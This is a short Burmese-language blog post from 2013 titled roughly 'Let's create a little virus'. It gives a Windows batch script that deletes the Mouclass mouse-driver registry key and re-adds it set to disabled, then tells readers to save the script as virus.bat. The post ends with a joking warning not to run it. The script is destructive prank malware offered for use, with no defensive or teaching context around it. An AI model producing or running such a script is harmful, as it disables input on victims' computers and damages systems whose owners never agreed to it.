Pages

Subscribe:

Ads 468x60px

ဒါေလးေတြတင္ထားတယ္

Saturday, August 10, 2013

Virus ေလးတစ္ေကာင္ဖန္တီးလိုက္ရေအာင္

Computer က Mouse ကုိ လႈပ္ရွားလုိ႔ မရေတာ့တဲ့ အေျခအေန Disable ျဖစ္သြားေအာင္ ျပဳလုပ္ေပးမယ့္ batch code
ေလး ျဖစ္ပါတယ္။ Notepad ကုိဖြင့္လုိက္ပါ။ ေအာက္ပါကုဒ္ေလးေတြကုိ ကူးၿပီး ထည့္ေပးလုိက္ပါ။

rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------


ၿပီးရင္ virus.bat ဆုိတဲ့ နာမည္နဲ႔ Save ပါမယ္။ Save as Type ဆုိတဲ့ ေနရာမွာ All Files ကိုေရြး
ေပးထားရပါမယ္။
ကဲ သူငယ္ခ်င္းတို႕ေရ သြားၿပီးမ Run နဲ႔ေနာ္

0 comments:

Post a Comment